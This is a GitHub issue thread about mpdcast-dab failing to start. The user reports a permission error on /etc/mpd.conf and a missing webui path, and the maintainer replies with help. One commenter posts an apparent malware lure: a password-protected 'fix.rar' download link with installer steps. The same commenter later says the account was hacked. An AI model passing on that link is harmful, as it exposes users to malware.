### ISSUE TITLE
Check installation procedure

### ISSUE THREAD

**Issue by andimik** [Lamarqe/mpdcast-dab#5]
https://github.com/Lamarqe/mpdcast-dab/blob/648fd9ba8c413f2701db78b392916501a223d7a5/README.md?plain=1#L138

In the past, I have used the precompiled version, but when I want to start it from the directory `mpdcast-dab` (so **not** `mpdcast_dab`) then I get the following error:

```
andreas@E535:~/apps/mpdcast-dab$ ./mpdcast_dab/__main__.py
Traceback (most recent call last):
  File "/home/andreas/apps/mpdcast-dab/./mpdcast_dab/__main__.py", line 170, in <module>
    main()
  File "/home/andreas/apps/mpdcast-dab/./mpdcast_dab/__main__.py", line 125, in main
    mpd_caster = prepare_cast(options, my_ip, web_app)
                 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/andreas/apps/mpdcast-dab/./mpdcast_dab/__main__.py", line 75, in prepare_cast
    if not mpd_caster.initialize():
           ^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/andreas/apps/mpdcast-dab/mpdcast_dab/mpdcast/mpd_caster.py", line 146, in initialize
    return self._mpd.config.initialize()
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/andreas/apps/mpdcast-dab/mpdcast_dab/mpdcast/mpd_caster.py", line 50, in initialize
    self.load()
  File "/home/andreas/apps/mpdcast-dab/mpdcast_dab/mpdcast/mpd_caster.py", line 60, in load
    with open(self._filename, 'r', encoding='utf-8') as cfg_file:
         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
PermissionError: [Errno 13] Permission denied: '/etc/mpd.conf'

```

which is coming from 

https://github.com/Lamarqe/mpdcast-dab/blob/648fd9ba8c413f2701db78b392916501a223d7a5/mpdcast_dab/__main__.py#L63

It seems that some paths are different on my Linux Mint (= Ubuntu 24.04) than on your system. Or the installation process has a bug in it.

For example, I also get 

```
FileNotFoundError: [Errno 2] No such file or directory: '/usr/share/mpdcast-dab/webui/index.htm'
```
The complete path `/usr/share/mpdcast-dab` does not exist here.

**Comment by 0xab01** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by 0xab01** [comment]
alert: my account has been hacked and someone is sending everywhere 200 mb
files that could be malware.

**Comment by 0xab01** [comment]
please dont download this

**Comment by Lamarqe** [comment]
What are the access permissions of the file `/etc/mpd.conf `on your system?
If that file is not accessible to non-root users, you have to extend file read permissions to other users to be able to run it with your local user.

Regarding the 2nd issue (`/usr/share/mpdcast-dab` does not exist): I added an enhancement to allow a local execution without needing an installation with https://github.com/Lamarqe/mpdcast-dab/commit/9897c67514b11a1a9ee5493a2942a82b28a31662.
